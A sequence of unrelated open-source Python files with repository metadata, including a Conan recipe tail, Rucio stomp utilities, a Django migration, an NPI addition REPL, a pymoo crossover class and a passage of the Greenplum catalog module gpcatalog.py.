            # settings object; use inequality.
            if self.settings.os != "Windows":
                tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.lib")
        else:
            self.copy(pattern="*.a", dst="lib", keep_path=False)
            self.copy(pattern="*.lib", dst="lib", keep_path=False)
            tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.dylib")
            tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.so")
            tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.dll")
        self.copy(pattern="*.fxh", dst="res", keep_path=False)
        self.copy("File2String*", src=os.path.join(self._build_subfolder, "bin"), dst="bin", keep_path=False)
        tools.remove_files_by_mask(self.package_folder, "*.pdb")

    def package_info(self):
        self.cpp_info.libs = tools.collect_libs(self)
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Common", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Primitives", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Platforms", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Platforms", "Basic", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Platforms", "Linux", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngine", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineD3D11", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineD3D12", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineVulkan", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineOpenGL", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsAccessories", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsTools", "interface"))
        self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "HLSL2GLSLConverterLib", "interface"))
        self.cpp_info.defines.append("SPIRV_CROSS_NAMESPACE_OVERRIDE={}".format(self.options["spirv-cross"].namespace))
        self.cpp_info.defines.append("{}=1".format(self._diligent_platform()))
        if self.settings.os in ["Macos", "Linux"]:
            self.cpp_info.system_libs = ["dl", "pthread"]
        if self.settings.os == 'Macos':
            self.cpp_info.frameworks = ["CoreFoundation", 'Cocoa']
| 45.108911 | 132 | 0.645193 |
795ac463a174cac6c514898ce79d2dbeb4e801bc | 2,216 | py | Python | lib/rucio/common/stomp_utils.py | ejr004/rucio | 81620cc54e3536e3656dfc83a4563da4ee39247e | [
"Apache-2.0"
] | 2 | 2020-02-18T22:34:24.000Z | 2022-03-09T16:26:18.000Z | lib/rucio/common/stomp_utils.py | ejr004/rucio | 81620cc54e3536e3656dfc83a4563da4ee39247e | [
"Apache-2.0"
] | null | null | null | lib/rucio/common/stomp_utils.py | ejr004/rucio | 81620cc54e3536e3656dfc83a4563da4ee39247e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Eric Vaandering <ewv@fnal.gov>, 2022
"""
Common utility functions for stomp connections
"""
import socket
from stomp import Connection
import logging
def get_stomp_brokers(brokers, port, use_ssl, vhost, reconnect_attempts, ssl_key_file, ssl_cert_file, timeout,
                      logger=logging.log):
    """Resolve broker host names and build one stomp Connection per address.

    Each name in *brokers* is resolved to its IPv4 addresses, and a
    Connection (plain or SSL, per *use_ssl*) is created for every address.
    Returns the list of Connection objects (not yet connected).
    """
    logger(logging.DEBUG, 'resolving broker dns alias: %s' % brokers)
    brokers_resolved = []
    for broker in brokers:
        addrinfos = socket.getaddrinfo(broker, 0, socket.AF_INET, 0, socket.IPPROTO_TCP)
        brokers_resolved.extend(ai[4][0] for ai in addrinfos)
    logger(logging.DEBUG, 'broker resolved to %s', brokers_resolved)

    conns = []
    for broker in brokers_resolved:
        # Options common to plain and SSL connections (previously duplicated
        # across two nearly identical Connection(...) calls).
        kwargs = {
            'use_ssl': use_ssl,
            'vhost': vhost,
            'timeout': timeout,
            'heartbeats': (0, 1000),
            'reconnect_attempts_max': reconnect_attempts,
        }
        if use_ssl:
            kwargs['ssl_key_file'] = ssl_key_file
            kwargs['ssl_cert_file'] = ssl_cert_file
        conns.append(Connection(host_and_ports=[(broker, port)], **kwargs))
    return conns
| 37.559322 | 110 | 0.58574 |
795ac4674d1a8b0b6b3d9ea5b9067f63becc5b1c | 1,130 | py | Python | backend/models.py | vasspilka/Automata | e53bd5004283cded0bf01ec7dc1e05a202f9bd02 | [
"Unlicense",
"MIT"
] | null | null | null | backend/models.py | vasspilka/Automata | e53bd5004283cded0bf01ec7dc1e05a202f9bd02 | [
"Unlicense",
"MIT"
] | null | null | null | backend/models.py | vasspilka/Automata | e53bd5004283cded0bf01ec7dc1e05a202f9bd02 | [
"Unlicense",
"MIT"
] | null | null | null | import db
import config
import logging
# Configure root logging to a file at import time.
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
                    filename='automata.log', level=logging.DEBUG)

# Module-level database connection, created as a side effect of importing
# this module.
DB = db.Database(config.SQL.HOST, config.SQL.USERNAME,
                 config.SQL.PASSWORD, config.SQL.DATABASE)
logging.info("Connected to SQL database\n")
class Automaton(object):
    """Persistence helpers for rows of the `automata` table."""

    def create(self, name, data, uid=''):
        """Insert a new automaton; returns whatever DB.insert returns."""
        return DB.insert('automata', {'name': name, 'data': data, 'uid': uid})

    def view(self, id):
        """Fetch one automaton by id, selecting the listed columns."""
        return DB.selectOne('automata', {'id': id}, ('id', 'name', 'data', 'uid'))

    def delete(self, id):
        # TODO: not implemented yet.
        pass

    def update(self, id, name, data):
        # TODO: not implemented yet.
        pass
class User(object):
    """Persistence helpers for rows of the `users` table, keyed by Google id."""

    def get(self, gid):
        """Return the user row whose gid matches, if any."""
        return DB.selectOne("users", {'gid': gid})

    def create(self, info):
        """Insert a user from a Google profile dict (google_id/name/email/picture)."""
        return DB.insert('users', {'gid': info['google_id'], 'name': info['name'],
                                   'email': info['email'], 'picture': info['picture']})

    def automata(self, gid):
        """Return the user's automata; implicitly returns None if no such user."""
        user = DB.selectOne("users", {'gid': gid})
        if user:
            return DB.select("automata", {'uid': user['gid']})
| 28.25 | 82 | 0.576991 |
795ac493b0670e8e939dde754e82e5fdeb766478 | 1,794 | py | Python | openslides_backend/action/actions/projector/control_view.py | MJJojo97/openslides-backend | af0d1edb0070e352d46f285a1ba0bbe3702d49ae | [
"MIT"
] | 5 | 2020-01-20T13:57:15.000Z | 2021-03-27T14:14:44.000Z | openslides_backend/action/actions/projector/control_view.py | MJJojo97/openslides-backend | af0d1edb0070e352d46f285a1ba0bbe3702d49ae | [
"MIT"
] | 859 | 2020-01-11T22:58:37.000Z | 2022-03-30T14:54:06.000Z | openslides_backend/action/actions/projector/control_view.py | MJJojo97/openslides-backend | af0d1edb0070e352d46f285a1ba0bbe3702d49ae | [
"MIT"
] | 16 | 2020-01-04T20:28:57.000Z | 2022-02-10T12:06:54.000Z | from typing import Any, Dict
from ....models.models import Projector
from ....permissions.permissions import Permissions
from ....shared.exceptions import ActionException
from ....shared.patterns import FullQualifiedId
from ...generics.update import UpdateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
@register_action("projector.control_view")
class ProjectorControlView(UpdateAction):
"""
Action to control view a projector.
"""
model = Projector()
schema = DefaultSchema(Projector()).get_update_schema(
additional_required_fields={
"field": {"type": "string", "enum": ["scale", "scroll"]},
"direction": {"type": "string", "enum": ["up", "down", "reset"]},
},
additional_optional_fields={
"step": {"type": "integer", "minimum": 1},
},
)
permission = Permissions.Projector.CAN_MANAGE
def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:
field = instance.pop("field")
direction = instance.pop("direction")
step = instance.pop("step", 1)
if direction == "reset":
new_value = 0
elif direction == "up":
projector = self.datastore.get(
FullQualifiedId(self.model.collection, instance["id"]), [field]
)
new_value = projector.get(field, 0) + step
elif direction == "down":
projector = self.datastore.get(
FullQualifiedId(self.model.collection, instance["id"]), [field]
)
new_value = projector.get(field, 0) - step
else:
raise ActionException(f"Unknown direction {direction}")
instance[field] = new_value
return instance
| 34.5 | 79 | 0.615942 |
795ac4e369cfecef8785479f392f1166a05cef53 | 1,293 | py | Python | Question_duplicate_number/python/main.py | josue-lubaki/awesome-interview | 6583e04ec25ebfd7a6647d7f7803c37d75852dee | [
"MIT"
] | 1 | 2022-01-11T23:44:56.000Z | 2022-01-11T23:44:56.000Z | Question_duplicate_number/python/main.py | josue-lubaki/awesome-interview | 6583e04ec25ebfd7a6647d7f7803c37d75852dee | [
"MIT"
] | null | null | null | Question_duplicate_number/python/main.py | josue-lubaki/awesome-interview | 6583e04ec25ebfd7a6647d7f7803c37d75852dee | [
"MIT"
] | null | null | null | """
function 1 : find_duplicate_by_josueLubaki
@param arr : list of numbers
@return list of integers
@author : Josue Lubaki
"""
def find_duplicate_by_josueLubaki(arr):
duplicates, seen = set(), set()
for element in arr:
if element in seen:
duplicates.add(element)
seen.add(element)
return duplicates
"""
function 2 : find_duplicate_number_by_josueLubaki
@param arr : list of numbers
@return list of integers
@author : Josue Lubaki
"""
def find_duplicate_number_by_josueLubaki(arr):
duplicates = set()
for i in range(len(arr)):
if arr[i] in arr[i + 1 :]:
duplicates.add(arr[i])
return duplicates
"""
function 3 : find_duplicate_number
@param arr : list of numbers
@return list of integers
@author : Josue Lubaki
"""
def find_duplicate_integer_by_josueLubaki(arr):
duplicates = set()
for i in range(len(arr)):
if arr.index(arr[i]) != i:
duplicates.add(arr[i])
return duplicates
"""
function 4 : find_duplicate_number
@param arr : list of numbers
@return list of integers
@author : ???
"""
# WRITE YOUR CODE HERE
# Test
list = [1, 7, 3, 4, 5, 6, 7, 3, 4]
print(find_duplicate_integer_by_josueLubaki(list)) # [3, 4, 7]
| 23.089286 | 63 | 0.634957 |
795ac531224f0a92bfad5fb9d19b642e1d38ad65 | 3,869 | py | Python | subjects/migrations/0001_initial.py | soumith2105/vasv-stdin-backend | 72472af0f4a9ea5d9d51f980d148badbb9252fe6 | [
"MIT"
] | null | null | null | subjects/migrations/0001_initial.py | soumith2105/vasv-stdin-backend | 72472af0f4a9ea5d9d51f980d148badbb9252fe6 | [
"MIT"
] | 1 | 2022-02-21T15:09:06.000Z | 2022-02-21T15:09:06.000Z | subjects/migrations/0001_initial.py | soumith2105/vasv-stdin-backend | 72472af0f4a9ea5d9d51f980d148badbb9252fe6 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.2 on 2021-05-11 22:16
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
("semesters", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="Subject",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=20)),
("full_name", models.CharField(blank=True, max_length=100, null=True)),
("lecturer", models.CharField(blank=True, max_length=150, null=True)),
("year", models.CharField(default="NA", max_length=15)),
("semester", models.IntegerField()),
("branch", models.CharField(default="IT", max_length=5)),
("section", models.CharField(blank=True, max_length=2)),
],
options={
"ordering": ["year", "semester", "branch", "section", "name"],
},
),
migrations.CreateModel(
name="SubjectBlock",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("total", models.IntegerField(default=0)),
("present", models.IntegerField(default=0)),
("absent", models.IntegerField(default=0)),
("int1_max", models.FloatField(default=0)),
("int1", models.FloatField(default=0)),
("int2_max", models.FloatField(default=0)),
("int2", models.FloatField(default=0)),
("assn1_max", models.FloatField(default=0)),
("assn1", models.FloatField(default=0)),
("assn2_max", models.FloatField(default=0)),
("assn2", models.FloatField(default=0)),
("assn3_max", models.FloatField(default=0)),
("assn3", models.FloatField(default=0)),
("quiz1_max", models.FloatField(default=0)),
("quiz1", models.FloatField(default=0)),
("quiz2_max", models.FloatField(default=0)),
("quiz2", models.FloatField(default=0)),
("quiz3_max", models.FloatField(default=0)),
("quiz3", models.FloatField(default=0)),
("sess_max", models.FloatField(default=0)),
("sess", models.FloatField(default=0)),
("ext_grade", models.CharField(default="NA", max_length=3)),
("ext_sub_credits", models.IntegerField(default=0)),
("ext_grade_pts", models.IntegerField(default=0)),
(
"semester",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="semesters.semester",
),
),
(
"subject",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="subjects.subject",
),
),
],
options={
"ordering": [
"-semester__semester",
"-semester__student__name",
"subject__name",
],
},
),
]
| 38.69 | 87 | 0.453089 |
795ac5c9fb2d3a9b12c78b7bc7151cd9528a08de | 139 | py | Python | pythran/tests/rosetta/generic_swap.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,647 | 2015-01-13T01:45:38.000Z | 2022-03-28T01:23:41.000Z | pythran/tests/rosetta/generic_swap.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,116 | 2015-01-01T09:52:05.000Z | 2022-03-18T21:06:40.000Z | pythran/tests/rosetta/generic_swap.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 180 | 2015-02-12T02:47:28.000Z | 2022-03-14T10:28:18.000Z | #from http://rosettacode.org/wiki/Generic_swap#Python
#pythran export swap(str, int)
#runas swap("e", 15)
def swap(a, b):
return b, a
| 19.857143 | 53 | 0.690647 |
795ac681e50cc715b00a6b7d2863b45a519ae201 | 1,392 | py | Python | pymoo/model/crossover.py | Peng-YM/pymoo | f2931be04ce1a33d641172340efde519bedcf22d | [
"Apache-2.0"
] | 1 | 2020-11-18T10:04:02.000Z | 2020-11-18T10:04:02.000Z | pymoo/model/crossover.py | Peng-YM/pymoo | f2931be04ce1a33d641172340efde519bedcf22d | [
"Apache-2.0"
] | null | null | null | pymoo/model/crossover.py | Peng-YM/pymoo | f2931be04ce1a33d641172340efde519bedcf22d | [
"Apache-2.0"
] | null | null | null | import numpy as np
from pymoo.model.population import Population
class Crossover:
"""
The crossover combines parents to offsprings. Some crossover are problem specific and use additional information.
This class must be inherited from to provide a crossover method to an algorithm.
"""
def __init__(self, n_parents, n_offsprings, prob=0.9):
self.prob = prob
self.n_parents = n_parents
self.n_offsprings = n_offsprings
def do(self, problem, *args, **kwargs):
if type(args[0]) is Population:
pop, parents = args
else:
pop = Population.create(*args)
parents = np.array([np.arange(len(args))])
if self.n_parents != parents.shape[1]:
raise ValueError('Exception during crossover: Number of parents differs from defined at crossover.')
# get the design space matrix form the population and parents
X = pop.get("X")[parents.T].copy()
# now apply the crossover probability
do_crossover = np.random.random(len(parents)) < self.prob
# execute the crossover
_X = self._do(problem, X, **kwargs)
X[:, do_crossover, :] = _X[:, do_crossover, :]
# flatten the array to become a 2d-array
X = X.reshape(-1, X.shape[-1])
# create a population object
off = pop.new("X", X)
return off
| 30.933333 | 117 | 0.625718 |
795ac74994163cdda01bd367390e0e08f0e5eb2b | 4,514 | py | Python | tasks/addition/eval.py | souradeepta/Neural-Programmer-Interpreter | 98bfbb5bf867834fa772f47c2866e3f683930b03 | [
"MIT"
] | null | null | null | tasks/addition/eval.py | souradeepta/Neural-Programmer-Interpreter | 98bfbb5bf867834fa772f47c2866e3f683930b03 | [
"MIT"
] | 5 | 2020-01-28T23:01:43.000Z | 2022-02-10T00:23:52.000Z | tasks/addition/eval.py | souradeepta/Neural-Programmer-Interpreter | 98bfbb5bf867834fa772f47c2866e3f683930b03 | [
"MIT"
] | 1 | 2020-04-29T17:51:10.000Z | 2020-04-29T17:51:10.000Z | """
eval.py
Loads in an Addition NPI, and starts a REPL for interactive addition.
"""
from model.npi import NPI
from tasks.addition.addition import AdditionCore
from tasks.addition.env.config import CONFIG, get_args, PROGRAM_SET, ScratchPad
import numpy as np
import pickle
import tensorflow as tf
LOG_PATH = "tasks/addition/log/"
CKPT_PATH = "tasks/addition/log/model.ckpt"
TEST_PATH = "tasks/addition/data/test.pik"
MOVE_PID, WRITE_PID = 0, 1
W_PTRS = {0: "OUT", 1: "CARRY"}
PTRS = {0: "IN1_PTR", 1: "IN2_PTR", 2: "CARRY_PTR", 3: "OUT_PTR"}
R_L = {0: "LEFT", 1: "RIGHT"}
def evaluate_addition():
"""
Load NPI Model from Checkpoint, and initialize REPL, for interactive carry-addition.
"""
# Load Data
with open(TEST_PATH, 'rb') as f:
data = pickle.load(f)
# Initialize Addition Core
core = AdditionCore()
# Initialize NPI Model
npi = NPI(core, CONFIG, LOG_PATH)
with tf.Session() as sess:
# Restore from Checkpoint
saver = tf.train.Saver()
saver.restore(sess, CKPT_PATH)
# Run REPL
repl(sess, npi, data)
def repl(session, npi, data):
while True:
inpt = input('Enter Two Numbers, or Hit Enter for Random Pair: ')
if inpt == "":
x, y, _ = data[np.random.randint(len(data))]
else:
x, y = map(int, inpt.split())
# Reset NPI States
print ()
npi.reset_state()
# Setup Environment
scratch = ScratchPad(x, y)
prog_name, prog_id, arg, term = 'ADD', 2, [], False
cont = 'c'
while cont == 'c' or cont == 'C':
# Print Step Output
if prog_id == MOVE_PID:
a0, a1 = PTRS.get(arg[0], "OOPS!"), R_L[arg[1]]
a_str = "[%s, %s]" % (str(a0), str(a1))
elif prog_id == WRITE_PID:
a0, a1 = W_PTRS[arg[0]], arg[1]
a_str = "[%s, %s]" % (str(a0), str(a1))
else:
a_str = "[]"
print ('Step: %s, Arguments: %s, Terminate: %s' % (prog_name, a_str, str(term)))
print ('IN 1: %s, IN 2: %s, CARRY: %s, OUT: %s' % (scratch.in1_ptr[1],
scratch.in2_ptr[1],
scratch.carry_ptr[1],
scratch.out_ptr[1]))
# Update Environment if MOVE or WRITE
if prog_id == MOVE_PID or prog_id == WRITE_PID:
scratch.execute(prog_id, arg)
# Print Environment
scratch.pretty_print()
# Get Environment, Argument Vectors
env_in, arg_in, prog_in = [scratch.get_env()], [get_args(arg, arg_in=True)], [[prog_id]]
t, n_p, n_args = session.run([npi.terminate, npi.program_distribution, npi.arguments],
feed_dict={npi.env_in: env_in, npi.arg_in: arg_in,
npi.prg_in: prog_in})
if np.argmax(t) == 1:
print ('Step: %s, Arguments: %s, Terminate: %s' % (prog_name, a_str, str(True)))
print ('IN 1: %s, IN 2: %s, CARRY: %s, OUT: %s' % (scratch.in1_ptr[1],
scratch.in2_ptr[1],
scratch.carry_ptr[1],
scratch.out_ptr[1]))
# Update Environment if MOVE or WRITE
if prog_id == MOVE_PID or prog_id == WRITE_PID:
scratch.execute(prog_id, arg)
# Print Environment
scratch.pretty_print()
output = int("".join(map(str, map(int, scratch[3]))))
print ("Model Output: %s + %s = %s" % (str(x), str(y), str(output)))
print ("Correct Out : %s + %s = %s" % (str(x), str(y), str(x + y)))
print ("Correct!" if output == (x + y) else "Incorrect!")
break
else:
prog_id = np.argmax(n_p)
prog_name = PROGRAM_SET[prog_id][0]
if prog_id == MOVE_PID or prog_id == WRITE_PID:
arg = [np.argmax(n_args[0]), np.argmax(n_args[1])]
else:
arg = []
term = False
cont = 'c'
# cont = input('Continue? ') | 36.699187 | 100 | 0.480948 |
795ac7b8d87a2f9d24cf8cb68548e52cf905e8f1 | 452 | py | Python | lezione2/python/esempi_liste.py | FabLab-Western-Sicily/coding-class-scratch-python | 85f20e727c1cc3659f553de048ed0d462d7f11dd | [
"MIT"
] | 1 | 2020-11-04T11:15:08.000Z | 2020-11-04T11:15:08.000Z | lezione2/python/esempi_liste.py | FabLab-Western-Sicily/coding-class-scratch-python | 85f20e727c1cc3659f553de048ed0d462d7f11dd | [
"MIT"
] | null | null | null | lezione2/python/esempi_liste.py | FabLab-Western-Sicily/coding-class-scratch-python | 85f20e727c1cc3659f553de048ed0d462d7f11dd | [
"MIT"
] | null | null | null | lista_esempio = []
altra_lista = list()
lista_esempio = [1,2,3,4]
print(altra_lista)
print(lista_esempio)
print(lista_esempio[1])
print(lista_esempio[-1])
print(lista_esempio[:-1])
lista_esempio.append(7)
print(lista_esempio)
lista_esempio.insert(2, 1)
print(lista_esempio)
lista_esempio.pop()
print(lista_esempio)
lista_esempio.remove(2)
print(lista_esempio)
print(lista_esempio.count(1))
lista_esempio.reverse()
print(lista_esempio) | 12.216216 | 29 | 0.767699 |
795ac8a9699d3bcb8f999347705cd36e7f99b3f5 | 24,018 | py | Python | gpMgmt/bin/gppylib/gpcatalog.py | khuddlefish/gpdb | 2d20bae838c5ed433eecf6ecceca1b8dd5221197 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/gpcatalog.py | khuddlefish/gpdb | 2d20bae838c5ed433eecf6ecceca1b8dd5221197 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/gpcatalog.py | khuddlefish/gpdb | 2d20bae838c5ed433eecf6ecceca1b8dd5221197 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (c) 2010-2011 EMC Corporation. All Rights Reserved
#
"""
gpcatalog.py
Contains two classes representing catalog metadata:
Catalog - a container class for CatalogTables
CatalogTable - metadata about a single tables
"""
# ============================================================================
import os
import json
from gppylib import gplog
from gppylib.gpversion import GpVersion
logger = gplog.get_default_logger()
class GPCatalogException(Exception):
pass
# Hard coded since "master only" is not defined in the catalog
MASTER_ONLY_TABLES = [
'gp_segment_configuration',
'gp_configuration_history',
'gp_distribution_policy',
'gp_segment_configuration',
'pg_description',
'pg_listener', # ???
'pg_partition',
'pg_partition_rule',
'pg_shdescription',
'pg_stat_last_operation',
'pg_stat_last_shoperation',
'pg_statistic',
'pg_filespace_entry',
'pg_partition_encoding',
'pg_auth_time_constraint',
]
# Hard coded since "persistent" is not defined in the catalog
PERSISTENT_TABLES = [
'gp_global_sequence',
'gp_persistent_database_node',
'gp_persistent_filespace_node',
'gp_persistent_relation_node',
'gp_persistent_tablespace_node',
'gp_relation_node',
]
# Hard coded tables that have different values on every segment
SEGMENT_LOCAL_TABLES = [
'gp_id',
'pg_shdepend', # (not if we fix oid inconsistencies)
'gp_fastsequence', # AO segment row id allocations
'pg_statistic',
]
# These catalog tables either do not use pg_depend or does not create an
# entry in pg_depend immediately when an entry is created in that
# catalog table
DEPENDENCY_EXCLUSION = [
'pg_authid',
'pg_compression',
'pg_conversion',
'pg_database',
'pg_enum',
'pg_filespace',
'pg_namespace',
'pg_partition',
'pg_partition_rule',
'pg_resgroup',
'pg_resgroupcapability',
'pg_resourcetype',
'pg_resqueue',
'pg_resqueuecapability',
'pg_tablespace'
]
# ============================================================================
class GPCatalog():
"""
Catalog is a container class that contains dictionary of CatalogTable
objects.
It provides the CatalogTables with a context that they can use to
refer to other CatalogTables (e.g. describe foreign keys) and it
provides calling code with a simple wrapper for what a known catalog
layout looks like.
It supports multiple source versions of the database. It issues a
warning if there are catalog tables defined in the database that
it is unaware of, usually indicating that it is operating against
an unknown version.
"""
# --------------------------------------------------------------------
# Public API functions:
# - Catalog() - Create a Catalog object
# - getCatalogTable() - Returns a single CatalogTable
# - getCatalogTables() - Returns a list of CatalogTable
# - getCatalogVersion() - Returns a GpVersion
# --------------------------------------------------------------------
def getCatalogTable(self, tablename):
"""
getCatalogTable(tablename) => Returns the specified CatalogTable
Raises: CatalogException when the table does not exist
"""
if tablename not in self._tables:
raise GPCatalogException("No such catalog table: %s" % str(tablename))
return self._tables[tablename]
def getCatalogTables(self):
"""
getCatalogTables() => Returns a list of CatalogTable
"""
return self._tables.values()
def getCatalogVersion(self):
"""
getCatalogVersion() => Returns the GpVersion object
"""
return self._version
# --------------------------------------------------------------------
# Private implementation functions:
# --------------------------------------------------------------------
def __init__(self, dbConnection):
"""
Catalog() constructor
1) Uses the supplied database connection to get a list of catalog tables
2) iterate through the list building up CatalogTable objects
3) Mark "master only" tables manually
4) Mark a couple primary keys manually
5) Mark foreign keys manually
6) Mark known catalog differences manually
7) Validate and return the Catalog object
"""
self._dbConnection = dbConnection
self._tables = {}
self._version = None
self._tidycat = {} # tidycat definitions from JSON file
version_query = """
SELECT version()
"""
catalog_query = """
SELECT relname, relisshared FROM pg_class
WHERE relnamespace=11 and relkind = 'r'
"""
# Read the catalog version from the database
try:
curs = self._query(version_query)
except Exception, e:
raise GPCatalogException("Error reading database version: " + str(e))
self._version = GpVersion(curs.getresult()[0][0])
# Read the list of catalog tables from the database
try:
curs = self._query(catalog_query)
except Exception, e:
raise GPCatalogException("Error reading catalog: " + str(e))
# Construct our internal representation of the catalog
for [relname, relisshared] in curs.getresult():
self._tables[relname] = GPCatalogTable(self, relname)
# Note: stupid API returns t/f for boolean value
self._tables[relname]._setShared(relisshared is 't')
# The tidycat.pl utility has been used to generate a json file
# describing aspects of the catalog that we can not currently
# interrogate from the catalog itself. This includes things
# like which tables are master only vs segment local and what
# the foreign key relationships are.
self._getJson()
# Which tables are "master only" is not derivable from the catalog
# so we have to set this manually.
self._markMasterOnlyTables()
# We derived primary keys for most of the catalogs based on un
# unique indexes, but we have to manually set a few stranglers
self._setPrimaryKeys()
# Foreign key relationships of the catalog tables are not actually
# defined in the catalog, so must be obtained from tidycat
self._setForeignKeys()
# Most catalog tables are now ready to go, but some columns can
# not be compared directly between segments, we need to indicate
# these exceptions manually.
self._setKnownDifferences()
# Finally validate that everything looks right, this will issue
# warnings if there are any regular catalog tables that do not
# have primary keys set.
self._validate()
def _query(self, qry):
"""
Simple wrapper around querying the database connection
"""
return self._dbConnection.query(qry)
def _markMasterOnlyTables(self):
"""
We mark three types of catalog tables as "master only"
- True "master only" tables
- Tables we know to have different contents on master/segment
- Persistent Tables
While the later two are not technically "master only" they have
the property that we cannot validate cross segment consistency,
which makes them the same for our current purposes.
We may want to eventually move these other types of tables into
a different classification.
"""
for name in MASTER_ONLY_TABLES:
if name in self._tables:
self._tables[name]._setMasterOnly()
for name in SEGMENT_LOCAL_TABLES:
if name in self._tables:
self._tables[name]._setMasterOnly()
for name in PERSISTENT_TABLES:
if name in self._tables:
self._tables[name]._setMasterOnly()
def _setPrimaryKeys(self):
"""
Most of the catalog primary keys are set automatically in
CatalogTable by looking at unique indexes over the catalogs.
However there are a couple of catalog tables that do not have
unique indexes that we still want to perform cross segment
consistency on, for them we have to manually set a primary key
"""
self._tables['gp_version_at_initdb']._setPrimaryKey(
"schemaversion productversion")
self._tables['pg_constraint']._setPrimaryKey(
"conname connamespace conrelid contypid")
self._tables['pg_depend']._setPrimaryKey(
"classid objid objsubid refclassid refobjid refobjsubid deptype")
if self._version >= "4.0":
self._tables['pg_resqueuecapability']._setPrimaryKey(
"resqueueid restypid")
def _getJson(self):
"""
Read the json file generated by tidycat which contains, among other
things, the primary key/foreign key relationships for the catalog
tables. Build the fkeys for each table and validate them against
the catalog.
"""
indir = os.path.dirname(__file__)
jname = str(self._version.getVersionRelease()) + ".json"
try:
# json doc in data subdirectory of pylib module
infil = open(os.path.join(indir, "data", jname), "r")
d = json.load(infil)
# remove the tidycat comment
if "__comment" in d:
del d["__comment"]
if "__info" in d:
del d["__info"]
infil.close()
self._tidycat = d
except Exception, e:
# older versions of product will not have tidycat defs --
# need to handle this case
logger.warn("GPCatalogTable: "+ str(e))
def _setForeignKeys(self):
"""
Setup the foreign key relationships amongst the catalogs. We
drive this based on the tidycat generate json file since this
information is not derivable from the catalog.
"""
try:
for tname, tdef in self._tidycat.iteritems():
if "foreign_keys" not in tdef:
continue
for fkdef in tdef["foreign_keys"]:
fk2 = GPCatalogTableForeignKey(tname,
fkdef[0],
fkdef[1],
fkdef[2])
self._tables[tname]._addForeignKey(fk2)
except Exception, e:
# older versions of product will not have tidycat defs --
# need to handle this case
logger.warn("GPCatalogTable: "+ str(e))
def _setKnownDifferences(self):
"""
Some catalogs have columns that, for one reason or another, we
need to mark as being different between the segments and the master.
These fall into two catagories:
- Bugs (marked with the appropriate jiras)
- A small number of "special" columns
"""
# -------------
# Special cases
# -------------
# pg_class:
# - relfilenode should generally be consistent, but may not be (jira?)
# - relpages/reltuples/relfrozenxid are all vacumm/analyze related
# - relhasindex/relhaspkey are only cleared when vacuum completes
# - relowner has its own checks:
# => may want to separate out "owner" columns like acl and oid
self._tables['pg_class']._setKnownDifferences(
"relfilenode relpages reltuples relhasindex relhaspkey relowner relfrozenxid")
# pg_type: typowner has its own checks:
# => may want to separate out "owner" columns like acl and oid
self._tables['pg_type']._setKnownDifferences("typowner")
# pg_database: datfrozenxid = vacuum related
self._tables['pg_database']._setKnownDifferences("datfrozenxid")
# -------------
# Issues still present in the product
# -------------
# MPP-11289 : inconsistent OIDS for table "default values"
self._tables['pg_attrdef']._setKnownDifferences("oid")
# MPP-11284 : inconsistent OIDS for constraints
self._tables['pg_constraint']._setKnownDifferences("oid")
# MPP-11282: Inconsistent oids for language callback functions
# MPP-12015: Inconsistent oids for operator communtator/negator functions
self._tables['pg_proc']._setKnownDifferences("oid prolang")
# MPP-11282: pg_language oids and callback functions
self._tables['pg_language']._setKnownDifferences("oid lanplcallfoid lanvalidator")
# MPP-12015: Inconsistent oids for operator communtator/negator functions
